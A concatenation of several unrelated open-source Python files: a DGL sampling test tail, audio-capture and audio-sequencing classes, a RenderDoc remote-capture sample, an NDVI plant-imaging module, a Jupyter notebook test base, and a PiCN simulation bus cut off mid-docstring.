assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
check_rpc_find_edges(Path(tmpdirname), 2)
check_rpc_find_edges(Path(tmpdirname), 1)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my githib for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
def getFFT(data,rate):
"""Given some data and rate, returns FFTfreq and FFT (half)."""
data=data*np.hamming(len(data))
fft=np.fft.fft(data)
fft=np.abs(fft)
#fft=10*np.log10(fft)
freq=np.fft.fftfreq(len(fft),1.0/rate)
return freq[:int(len(freq)/2)],fft[:int(len(fft)/2)]
class SWHear():
"""
The SWHear class is provides access to continuously recorded
(and mathematically processed) microphone data.
Arguments:
device - the number of the sound card input to use. Leave blank
to automatically detect one.
rate - sample rate to use. Defaults to something supported.
updatesPerSecond - how fast to record new data. Note that smaller
numbers allow more data to be accessed and therefore high
frequencies to be analyzed if using a FFT later
"""
def __init__(self,device=None,rate=None,updatesPerSecond=10):
self.p=pyaudio.PyAudio()
self.chunk=4096 # gets replaced automatically
self.updatesPerSecond=updatesPerSecond
self.chunksRead=0
self.device=device
self.rate=rate
self.data = None # will fill up with threaded recording data
self.fft = None
### SYSTEM TESTS
def valid_low_rate(self,device):
"""set the rate to the lowest supported audio rate."""
for testrate in [44100]:
if self.valid_test(device,testrate):
return testrate
print("SOMETHING'S WRONG! I can't figure out how to use DEV",device)
return None
def valid_test(self,device,rate=44100):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info=self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"]>0:
return False
#print("Testing Device ",device,"\n------------------")
#for key, value in self.info.items(): # dct.iteritems() in Python 2
# print("{} ({})".format(key, value))
#print("")
stream=self.p.open(format=pyaudio.paInt16,channels=1,
input_device_index=device,frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]),input=True)
stream.close()
return True
except Exception as E:
#print("DEVICE INVALID:")
#print(E,"\n"*3)
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
call this when no PyAudio object is loaded.
"""
mics=[]
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics)==0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s"%(len(mics),mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device=self.valid_input_devices()[0] #pick the first one
if self.rate is None:
self.rate=self.valid_low_rate(self.device)
self.chunk = int(self.rate/self.updatesPerSecond) # hold one tenth of a second in memory
if not self.valid_test(self.device,self.rate):
print("Guessing a valid microphone device/rate...")
self.device=self.valid_input_devices()[0] #pick the first one
self.rate=self.valid_low_rate(self.device)
self.datax=np.arange(self.chunk)/float(self.rate)
msg='recording from "%s" '%self.info["name"]
msg+='(device %d) '%self.device
msg+='at %d Hz'%self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording=False #the threads should self-close
while self.t.is_alive(): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
try:
self.data = np.fromstring(self.stream.read(self.chunk),dtype=np.int16)
self.fftx, self.fft = getFFT(self.data,self.rate)
except Exception as E:
print(" -- exception! terminating...")
print(E,"\n"*5)
self.keepRecording=False
if self.keepRecording:
self.stream_thread_new()
else:
self.stream.close()
#self.p.terminate() #MM what if you want to restart? this doesnt seem right?
print(" -- stream STOPPED")
self.chunksRead+=1
def stream_thread_new(self):
self.t=threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" -- starting stream")
self.keepRecording=True # set this to False later to terminate stream
self.data=None # will fill up with threaded recording data
self.fft=None
self.dataFiltered=None #same
self.stream=self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.rate,input=True,frames_per_buffer=self.chunk)
self.stream_thread_new()
def stream_stop(self):
"""gently detach from things."""
print(" -- sending stream termination command...")
self.keepRecording=False #the threads should self-close
while self.t.is_alive(): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
if __name__=="__main__":
ear=SWHear(updatesPerSecond=10) # optinoally set sample rate here
ear.stream_start() #goes forever
lastRead=ear.chunksRead
loop = 5
while loop > 0:
loop = loop - 1
while lastRead==ear.chunksRead:
time.sleep(.01)
print(ear.chunksRead,len(ear.data))
lastRead=ear.chunksRead
ear.stream_stop()
print("DONE")
|
remote_capture.py
|
import renderdoc as rd
import threading
import time
# This sample is intended as an example of how to do remote capture and replay
# as well as using device protocols to automatically enumerate remote targets.
#
# It is not complete since it requires filling in with custom logic to select
# the executable and trigger the capture at the desired time
raise RuntimeError("This sample should not be run directly, read the source")
protocols = rd.GetSupportedDeviceProtocols()
print(f"Supported device protocols: {protocols}")
# Protocols are optional - they allow automatic detection and management of
# devices.
if protocol_to_use is not None:
# the protocol must be supported
if protocol_to_use not in protocols:
raise RuntimeError(f"{protocol_to_use} protocol not supported")
protocol = rd.GetDeviceProtocolController(protocol_to_use)
devices = protocol.GetDevices()
if len(devices) == 0:
raise RuntimeError(f"no {protocol_to_use} devices connected")
# Choose the first device
dev = devices[0]
name = protocol.GetFriendlyName(dev)
print(f"Running test on {dev} - named {name}")
URL = protocol.GetProtocolName() + "://" + dev
# Protocols can enumerate devices which are not supported. Capture/replay
# is not guaranteed to work on these devices
if not protocol.IsSupported(URL):
raise RuntimeError(f"{dev} doesn't support capture/replay - too old?")
# Protocol devices may be single-use and not support multiple captured programs
# If so, trying to execute a program for capture is an error
if not protocol.SupportsMultiplePrograms(URL):
# check to see if anything is running. Just use the URL
ident = rd.EnumerateRemoteTargets(URL, 0)
if ident != 0:
raise RuntimeError(f"{name} already has a program running on {ident}")
else:
# If you're not using a protocol then the URL can simply be a hostname.
# The remote server must be running already - how that is done is up
# to you. Everything else will work the same over a normal TCP connection
protocol = None
URL = hostname
# Let's try to connect
status,remote = rd.CreateRemoteServerConnection(URL)
if status == rd.ReplayStatus.NetworkIOFailed and protocol is not None:
# If there's just no I/O, most likely the server is not running. If we have
# a protocol, we can try to start the remote server
print("Couldn't connect to remote server, trying to start it")
status = protocol.StartRemoteServer(URL)
if status != rd.ReplayStatus.Succeeded:
raise RuntimeError(f"Couldn't launch remote server, got error {str(status)}")
# Try to connect again!
status,remote = rd.CreateRemoteServerConnection(URL)
if status != rd.ReplayStatus.Succeeded:
raise RuntimeError(f"Couldn't connect to remote server, got error {str(status)}")
# We now have a remote connection. This works regardless of whether it's a device
# with a protocol or not. In fact we are done with the protocol at this point
protocol = None
print("Got connection to remote server")
# GetHomeFolder() gives you a good default path to start with.
# ListFolder() lists the contents of a folder and can recursively
# browse the remote filesystem.
home = remote.GetHomeFolder()
paths = remote.ListFolder(home)
print(f"Executables in home folder '{home}':")
for p in paths:
print(" - " + p.filename)
# Select your executable, perhaps hardcoded or browsing using the above
# functions
exe,workingDir,cmdLine,env,opts = select_executable()
print(f"Running {exe}")
result = remote.ExecuteAndInject(exe, workingDir, cmdLine, env, opts)
if result.status != rd.ReplayStatus.Succeeded:
remote.ShutdownServerAndConnection()
raise RuntimeError(f"Couldn't launch {exe}, got error {str(result.status)}")
# Spin up a thread to keep the remote server connection alive while we make a capture,
# as it will time out after 5 seconds of inactivity
def ping_remote(remote, kill):
success = True
while success and not kill.is_set():
success = remote.Ping()
time.sleep(1)
kill = threading.Event()
ping_thread = threading.Thread(target=ping_remote, args=(remote,kill))
ping_thread.start()
# Create target control connection
target = rd.CreateTargetControl(URL, result.ident, 'remote_capture.py', True)
if target is None:
kill.set()
ping_thread.join()
remote.ShutdownServerAndConnection()
raise RuntimeError(f"Couldn't connect to target control for {exe}")
print("Connected - waiting for desired capture")
# Wait for the capture condition we want
capture_condition()
print("Triggering capture")
target.TriggerCapture(1)
# Pump messages, keep waiting until we get a capture message. Time out after 30 seconds
msg = None
start = time.clock()
while msg is None or msg.type != rd.TargetControlMessageType.NewCapture:
msg = target.ReceiveMessage(None)
if time.clock() - start > 30:
break
# Close the target connection, we're done either way
target.Shutdown()
target = None
# Stop the background ping thread
kill.set()
ping_thread.join()
# If we didn't get a capture, error now
if msg.type != rd.TargetControlMessageType.NewCapture:
remote.ShutdownServerAndConnection()
raise RuntimeError("Didn't get new capture notification after triggering capture")
cap_path = msg.newCapture.path
cap_id = msg.newCapture.captureId
print(f"Got new capture at {cap_path} which is frame {msg.newCapture.frameNumber} with {msg.newCapture.api}")
# We could save the capture locally
# remote.CopyCaptureFromRemote(cap_path, local_path, None)
# Open a replay. It's recommended to set no proxy preference, but you could
# call remote.LocalProxies and choose an index.
#
# The path must be remote - if the capture isn't freshly created then you need
# to copy it with remote.CopyCaptureToRemote()
status,controller = remote.OpenCapture(rd.RemoteServer.NoPreference, cap_path, None)
if status != rd.ReplayStatus.Succeeded:
remote.ShutdownServerAndConnection()
raise RuntimeError(f"Couldn't open {cap_path}, got error {str(result.status)}")
# We can now use replay as normal.
#
# The replay is tunnelled over the remote connection, so you don't have to keep
# pinging the remote connection while using the controller. Use of the remote
# connection and controller can be interleaved though you should only access
# them from one thread at once. If they are both unused for 5 seconds though,
# the timeout will happen, so if the controller is idle it's advisable to ping
# the remote connection
sampleCode(controller)
print("Shutting down")
controller.Shutdown()
# We can still use remote here - e.g. capture again, replay something else,
# save the capture, etc
remote.ShutdownServerAndConnection()
|
ndvi.py
|
import datetime
import time
import cv2
import numpy as np
import multiprocessing as mp
# set up matplotlib in such a way that it does not require an X server
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from imageio import imwrite
from astroplant_camera_module.misc.debug_print import d_print
from astroplant_camera_module.typedef import LC
# function used to obtain Polariks ndvi map
def truncate_colormap(cmap, minval=0.0, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list("trunc({n},{a:.2f},{b:.2f})".format(n=cmap.name, a=minval, b=maxval), cmap(np.linspace(minval, maxval, n)))
return new_cmap
class NDVI(object):
def __init__(self, *args, camera, **kwargs):
"""
Initialize an object that contains the NDVI routines. Since this module is an extra module that can be loaded on top of a simple camera that just takes pictures, it is in a seperate file.
:param camera: link to the camera object controlling these subroutines
"""
self.camera = camera
def ndvi_matrix(self):
"""
Internal function that makes the ndvi matrix from a red and a nir image. Pixel values are compared to the saved values from the calibration earlier in the process.
:return: ndvi matrix
"""
# capture images in a square rgb array
rgb_r, gain_r = self.camera.capture(LC.RED)
rgb_nir, gain_nir = self.camera.capture(LC.NIR)
# if an error is caught upstream, send it downstream
if rgb_r is None or rgb_nir is None:
return None
# crop the sensor readout
rgb_r = rgb_r[self.camera.settings.crop["y_min"]:self.camera.settings.crop["y_max"], self.camera.settings.crop["x_min"]:self.camera.settings.crop["x_max"], :]
r = rgb_r[:,:,0]
# apply flatfield mask
mask = self.camera.config["ff"]["value"]["red"]
Rr = 0.8*self.camera.config["ff"]["gain"]["red"]/gain_r*np.divide(r, mask)
# crop the sensor readout
rgb_nir = rgb_nir[self.camera.settings.crop["y_min"]:self.camera.settings.crop["y_max"], self.camera.settings.crop["x_min"]:self.camera.settings.crop["x_max"], :]
hsv = cv2.cvtColor(rgb_nir, cv2.COLOR_RGB2HSV)
v = hsv[:,:,2]
# apply flatfield mask
mask = self.camera.config["ff"]["value"]["nir"]
Rnir = 0.8*self.camera.config["ff"]["gain"]["nir"]/gain_nir*np.divide(v, mask)
# write image to file using imageio's imwrite
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "red_raw")
imwrite(path_to_img, r.astype(np.uint8))
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "nir_raw")
imwrite(path_to_img, v.astype(np.uint8))
#d_print("\tred max: " + str(np.amax(Rr)), 1)
#d_print("\tnir max: " + str(np.amax(Rnir)), 1)
#d_print("ground plane red avg: {}".format(np.mean(Rr[self.camera.settings.ground_plane["y_min"]:self.camera.settings.ground_plane["y_max"], self.camera.settings.ground_plane["x_min"]:self.camera.settings.ground_plane["x_max"]])), 1)
#d_print("ground plane nir avg: {}".format(np.mean(Rnir[self.camera.settings.ground_plane["y_min"]:self.camera.settings.ground_plane["y_max"], self.camera.settings.ground_plane["x_min"]:self.camera.settings.ground_plane["x_max"]])), 1)
#d_print("nir gain: {} ff value: {} ff gain: {}".format(gain_nir, self.camera.config["ff"]["value"]["nir"], self.camera.config["ff"]["gain"]["nir"]), 1)
#d_print("red gain: {} ff value: {} ff gain: {}".format(gain_r, self.camera.config["ff"]["value"]["red"], self.camera.config["ff"]["gain"]["red"]), 1)
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "red")
imwrite(path_to_img, np.uint8(255*Rr/np.amax(Rr)))
path_to_img = "{}/cam/tmp/{}.jpg".format(self.camera.working_directory, "nir")
imwrite(path_to_img, np.uint8(255*Rnir/np.amax(Rnir)))
# finally calculate ndvi (with some failsafes)
Rr[Rnir < 0.1] = 0
Rnir[Rnir < 0.1] = 0
num = Rnir - Rr
den = Rnir + Rr
num[np.logical_and(den < 0.05, den > -0.05)] = 0.0
den[den < 0.05] = 1.0
ndvi = np.divide(num, den)
ndvi[0, 0] = 1.0
return ndvi
def ndvi_photo(self):
"""
Make a photo in the nir and the red spectrum and overlay to obtain ndvi.
:return: (path to the ndvi image, average ndvi value for >0.25 (iff the #pixels is larger than 2 percent of the total))
"""
# get the ndvi matrix
ndvi_matrix = self.ndvi_matrix()
# catch error
if ndvi_matrix is None:
res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
ndvi_matrix = np.clip(ndvi_matrix, -1.0, 1.0)
if np.count_nonzero(ndvi_matrix > 0.25) > 0.02*np.size(ndvi_matrix):
ndvi = np.mean(ndvi_matrix[ndvi_matrix > 0.25])
else:
ndvi = 0
rescaled = np.uint8(np.round(127.5*(ndvi_matrix + 1.0)))
ndvi_plot = np.copy(ndvi_matrix)
ndvi_plot[ndvi_plot<0.25] = np.nan
# write images to file using imageio's imwrite and matplotlibs savefig
d_print("Writing to file...", 1)
curr_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
# set multiprocessing to spawn (so NOT fork)
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
# write the matplotlib part in a separate process so no memory leaks
path_to_img_2 = "{}/cam/img/{}{}_{}.jpg".format(self.camera.working_directory, "ndvi", 2, curr_time)
p = mp.Process(target=plotter, args=(ndvi_plot, path_to_img_2,))
try:
p.start()
p.join()
except OSError:
d_print("Could not start child process, out of memory", 3)
res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
path_to_img_1 = "{}/cam/img/{}{}_{}.tif".format(self.camera.working_directory, "ndvi", 1, curr_time)
imwrite(path_to_img_1, rescaled)
res = dict()
res["contains_photo"] = True
res["contains_value"] = True
res["encountered_error"] = False
res["timestamp"] = curr_time
res["photo_path"] = [path_to_img_1, path_to_img_2]
res["photo_kind"] = ["raw NDVI", "processed NDVI"]
res["value"] = [ndvi]
res["value_kind"] = ["NDVI"]
res["value_error"] = [0.0]
return res
def ndvi(self):
"""
Make a photo in the nir and the red spectrum and overlay to obtain ndvi.
:return: average ndvi value
"""
# get the ndvi matrix
ndvi_matrix = self.ndvi_matrix()
# catch error
if ndvi_matrix is None:
res = dict()
res["contains_photo"] = False
res["contains_value"] = False
res["encountered_error"] = True
res["timestamp"] = curr_time
return res
ndvi = np.mean(ndvi_matrix[ndvi_matrix > 0.2])
res = dict()
res["contains_photo"] = False
res["contains_value"] = True
res["encountered_error"] = False
res["timestamp"] = curr_time
res["value"] = [ndvi]
res["value_kind"] = ["NDVI"]
res["value_error"] = [0.0]
return res
def plotter(ndvi, path_to_img):
# set the right colormap
cmap = plt.get_cmap("nipy_spectral_r")
Polariks_cmap = truncate_colormap(cmap, 0, 0.6)
plt.figure(figsize=(14,10))
plt.imshow(ndvi, cmap=Polariks_cmap)
plt.colorbar()
plt.title("NDVI")
plt.savefig(path_to_img)
time.sleep(2)
|
transport.py
|
import threading
import sounddevice as sd
import numpy as np
class NodeHandler:
"""
:param nodes: An array of nodes that should be played
:type nodes: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
"""
def __init__(self, nodes=[], fs=48000.0):
self.nodes = nodes
self.fs = fs
def add_node(self, node):
"""
:param node: Node to add to the handler
"""
self.nodes.append(node)
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
:type sample: int
:returns: A PCM value representing all the nodes in the node handler mixed together
:rtype: float
"""
t = sample / self.fs
sample_value = 0.0
for node in self.nodes:
sample_value = node.get_sample(t) + sample_value
if len(self.nodes) > 0:
sample_value = sample_value / len(self.nodes)
return sample_value
class EventHandler:
"""
:param events: An array of events that should be handled
:type events: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
"""
def __init__(self, events, fs=48000.0):
self.events = events
self.fs = fs
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
:type sample: in
"""
t = sample / self.fs
for event in self.events:
if sample % event.sample_freq == 0:
event.get_event(t)
class EventSequencer:
"""
:param events: An array of events that should be handled
:type events: array
:param fs: sample frequency of the handler, used to calculate a value of time
:type fs: float
:param sequence: An array of sample values at which events should be fired
:type sequence: array(int)
"""
def __init__(self, events, fs=48000.0, sequence=[]):
self.events = events
self.fs = fs
self.count = 0
self.pos = 0
self.sequence = sequence
def sample_callback(self, sample):
"""
:param sample: The current sample that should be used to calculate any events or values
:type sample: int
"""
t = sample / self.fs
if self.count == self.sequence[self.pos]:
self.pos = self.pos + 1
self.pos = self.pos % len(self.sequence)
self.count = 0
for event in self.events:
event.get_event(t)
self.count = self.count + 1
class GlobalTransport:
"""
:param event_handlers: An array of event handlers that should sync to this transport
:type event_handlers: array
:param input_device: The input device index. Can be found by running `python -m sounddevice` and selecting your desired device
:type input_device: int
:param output_device: The output device index. Can be found by running `python -m sounddevice` and selecting your desired device
:type output_device: int
:param channels: Number of channels the transport should have
:type channels: int
:param buffer_len: Audio buffer length of each channel
:type buffer_len: int
:param fs: Sampling frequency of the transport in Hz
:type fs: float
:ivar count: The current sample the transport is on
:vartype count: int
:ivar block: An array of audio data that will be output on the next buffer callback
:vartype block: array
:ivar chs: An array of node handlers that will be called for each channel
"""
def __init__(self, event_handlers, input_device=0, output_device=0, channels=2, buffer_len=1024, fs=48000.0):
sd.default.device = [input_device, output_device]
print("default device is: ", sd.default.device)
self.buffer_len = buffer_len
self.event_handlers = event_handlers
self.count = 0;
self.block = []
for i in range(self.buffer_len):
self.block.append([0.0] * channels)
self.channels = channels
self.chs = []
for i in range(channels):
self.chs.append(NodeHandler([]))
self.fs = fs
self.need_block = False
def get_block(self):
"""Executed every time an audio buffer is needed
"""
self.block = []
for s in range(self.buffer_len):
sample = []
for ch in self.chs:
sample.append(ch.sample_callback(self.count))
for handler in self.event_handlers:
handler.sample_callback(self.count)
self.count = self.count + 1
self.block.append(sample)
def buffer_cb(self, indata, outdata, frames, timer, status):
outdata[:] = self.block
self.get_block()
def begin_thread(self):
while True:
with sd.Stream(channels=self.channels, samplerate=48000, blocksize=self.buffer_len, callback=self.buffer_cb):
sd.sleep(1000 * 60 * 60 * 24)
def start(self):
threading.Thread(target=self.begin_thread).start()
|
launchnotebook.py
|
"""Base class for notebook tests."""
from __future__ import print_function
from binascii import hexlify
from contextlib import contextmanager
import errno
import os
import sys
from threading import Thread, Event
import time
from unittest import TestCase
pjoin = os.path.join
try:
from unittest.mock import patch
except ImportError:
from mock import patch #py2
import requests
from tornado.ioloop import IOLoop
import zmq
import jupyter_core.paths
from traitlets.config import Config
from ..notebookapp import NotebookApp
from ..utils import url_path_join
from ipython_genutils.tempdir import TemporaryDirectory
MAX_WAITTIME = 30 # seconds to wait for notebook server to start
POLL_INTERVAL = 0.1 # time between attempts
# TimeoutError is a builtin on Python 3. This can be removed when we stop
# supporting Python 2.
class TimeoutError(Exception):
pass
class NotebookTestBase(TestCase):
"""A base class for tests that need a running notebook.
This create some empty config and runtime directories
and then starts the notebook server with them.
"""
port = 12341
config = None
# run with a base URL that would be escaped,
# to test that we don't double-escape URLs
url_prefix = '/a%40b/'
@classmethod
def wait_until_alive(cls):
"""Wait for the server to be alive"""
url = cls.base_url() + 'api/contents'
for _ in range(int(MAX_WAITTIME/POLL_INTERVAL)):
try:
requests.get(url)
except Exception as e:
if not cls.notebook_thread.is_alive():
raise RuntimeError("The notebook server failed to start")
time.sleep(POLL_INTERVAL)
else:
return
raise TimeoutError("The notebook server didn't start up correctly.")
@classmethod
def wait_until_dead(cls):
"""Wait for the server process to terminate after shutdown"""
cls.notebook_thread.join(timeout=MAX_WAITTIME)
if cls.notebook_thread.is_alive():
raise TimeoutError("Undead notebook server")
@classmethod
def auth_headers(cls):
headers = {}
if cls.token:
headers['Authorization'] = 'token %s' % cls.token
return headers
@classmethod
def request(cls, verb, path, **kwargs):
"""Send a request to my server
with authentication and everything.
"""
headers = kwargs.setdefault('headers', {})
headers.update(cls.auth_headers())
response = requests.request(verb,
url_path_join(cls.base_url(), path),
**kwargs)
return response
@classmethod
def get_patch_env(cls):
return {
'HOME': cls.home_dir,
'PYTHONPATH': os.pathsep.join(sys.path),
'IPYTHONDIR': pjoin(cls.home_dir, '.ipython'),
'JUPYTER_NO_CONFIG': '1', # needed in the future
'JUPYTER_CONFIG_DIR' : cls.config_dir,
'JUPYTER_DATA_DIR' : cls.data_dir,
'JUPYTER_RUNTIME_DIR': cls.runtime_dir,
}
@classmethod
def get_argv(cls):
return []
@classmethod
def setup_class(cls):
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp('home')
data_dir = cls.data_dir = tmp('data')
config_dir = cls.config_dir = tmp('config')
runtime_dir = cls.runtime_dir = tmp('runtime')
cls.notebook_dir = tmp('notebooks')
cls.env_patch = patch.dict('os.environ', cls.get_patch_env())
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp('share', 'jupyter')],
ENV_JUPYTER_PATH=[tmp('env', 'share', 'jupyter')],
SYSTEM_CONFIG_PATH=[tmp('etc', 'jupyter')],
ENV_CONFIG_PATH=[tmp('env', 'etc', 'jupyter')],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ':memory:'
cls.token = hexlify(os.urandom(4)).decode('ascii')
started = Event()
def start_thread():
if 'asyncio' in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = NotebookApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda : None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize(argv=cls.get_argv())
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
@classmethod
def teardown_class(cls):
cls.notebook.stop()
cls.wait_until_dead()
cls.env_patch.stop()
cls.path_patch.stop()
cls.tmp_dir.cleanup()
# cleanup global zmq Context, to ensure we aren't leaving dangling sockets
def cleanup_zmq():
zmq.Context.instance().term()
t = Thread(target=cleanup_zmq)
t.daemon = True
t.start()
t.join(5) # give it a few seconds to clean up (this should be immediate)
# if term never returned, there's zmq stuff still open somewhere, so shout about it.
if t.is_alive():
raise RuntimeError("Failed to teardown zmq Context, open sockets likely left lying around.")
@classmethod
def base_url(cls):
return 'http://localhost:%i%s' % (cls.port, cls.url_prefix)
@contextmanager
def assert_http_error(status, msg=None):
try:
yield
except requests.HTTPError as e:
real_status = e.response.status_code
assert real_status == status, \
"Expected status %d, got %d" % (status, real_status)
if msg:
assert msg in str(e), e
else:
assert False, "Expected HTTP error status"
|
Simulation.py
|
"""Simulation System for PiCN. The PiCN Simulation System consists of a Simulation Bus and Simulation Interfaces
The Simulation Bus is the dispatcher for different Simulation Interfaces. Each Simulation Interface has a unique address
which can be used as identify for a Face in the LinkLayer.
"""
import multiprocessing
import select
import threading
import time
from sys import getsizeof
from typing import Dict
from PiCN.Processes import PiCNProcess
from PiCN.Layers.LinkLayer.Interfaces import BaseInterface
from PiCN.Layers.PacketEncodingLayer.Encoder import BasicEncoder, SimpleStringEncoder
class SimulationInterface(BaseInterface):
"""A Simulation Interface manages the communication between a PiCN Forwarder and the Simulation Bus
It can contain multiple parameter for packet loss or delay.
:param address: addr used by the interface
:param bandwidth: maximum bandwidth for the interface, 0 for no limit
:param delay_func: lambda-function, gets a packet as parameter and returns a delay value in seconds
:param packet_loss_func: gets a packet as parameter and returns if the packet was lost (true) or not (false)
"""
def __init__(self, address: str, max_bandwidth: int=0, delay_func=lambda packet: 0, packet_loss_func=lambda packet: False):
self._address = address
self.max_bandwidth = max_bandwidth #0 for infinite
self.delay = delay_func #Delay in microseconds
self.packet_loss = packet_loss_func #False if packet is not lost
self.queue_from_bus = multiprocessing.Queue()
self.queue_from_linklayer = multiprocessing.Queue()
@property
def file_descriptor(self):
return self.queue_from_bus._reader
def send(self, data, addr, src = "relay"):
if src == "relay":
self.queue_from_linklayer.put([addr, data])
elif src == "bus":
self.queue_from_bus.put([addr, data])
def receive(self, dst = "relay", timeout=0):
if dst == "relay":
if timeout > 0:
data = self.queue_from_bus.get(timeout=timeout)
else:
data = self.queue_from_bus.get()
elif dst == "bus":
if timeout > 0:
data = self.queue_from_linklayer.get(timeout=timeout)
else:
data = self.queue_from_linklayer.get()
addr = data[0]
packet = data[1]
return (packet, addr)
def address(self):
return self._address
def close(self):
self.queue_from_linklayer.close()
self.queue_from_bus.close()
class SimulationBus(PiCNProcess):
"""Simulation Bus that dispatches the communication between nodes in a Simulation"""
def __init__(self, packetencoder: BasicEncoder=SimpleStringEncoder(), print_keep_alive=True):
self.interfacetable: Dict[str, SimulationInterface] = {}
self.packetencoder = packetencoder
self.print_keep_alive = print_keep_alive
def start_process(self):
self.process = multiprocessing.Process(target=self._run)
self.process.daemon = True
self.process.start()
def stop_process(self):
for iface in self.interfacetable.values():
iface.close()
if self.process:
self.process.terminate()
def _run(self):
"""Run the main loop of the Simulation Bus"""
time_interval = 3
data_amount = 0
timestamp = time.time()
while True:
poller = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
fds = list(map((lambda x: x.queue_from_linklayer._reader), list(self.interfacetable.values())))
for fd in fds:
poller.register(fd, READ_ONLY)
ready_fds = poller.poll()
for fd in ready_fds:
interfaces = list(filter(lambda x: x.queue_from_linklayer._reader.fileno() == fd[0], self.interfacetable.values()))
try:
interface = interfaces[0]
except:
return
packet, dst_addr = interface.receive("bus")
src_addr = interface.address()
if dst_addr not in self.interfacetable:
continue
dec_packet = self.packetencoder.decode(packet)
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print(f"{time.time():.5f}" + "\tSending packet from\t'" + src_addr + "'\tto\t'" + dst_addr + "':\t'" +
str(type(dec_packet)).replace("class ","").replace("PiCN.Packets.", "") + "\t"+
str(dec_packet.name).replace("\n", " ") + "'" , end="") #TODO improve logging
dst_interface: SimulationInterface = self.interfacetable.get(dst_addr)
if dst_interface.packet_loss(packet):
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print("\t... LOST")
return
if dst_interface.max_bandwidth > 0: #TODO check and improve that
t = time.time()
if timestamp + time_interval > t:
timestamp = time.time()
data_amount = 0
elif data_amount * 1/time_interval > dst_interface.max_bandwidth:
time.sleep(time_interval - (t - timestamp))
else:
data_amount += getsizeof(packet)
delay = dst_interface.delay(packet)
if self.print_keep_alive or (dec_packet.name.components[-1] == b'NFN' and dec_packet.name.components[-2] != b"KEEPALIVE"):
print("\t(delay: " + str(delay) + ")")
#t = threading.Timer(delay, dst_interface.send, args=[packet, src_addr, "bus"])
#t.setDaemon(True)
#t.start()
time.sleep(delay)
dst_interface.send(packet, src_addr, "bus")
def add_interface(self, addr, max_bandwidth: int=0, delay_func=lambda packet: 0, packet_loss_func=lambda packet: False):
"""create a new interface given a addr and adds it to the
:param addr: address to be used for the interface
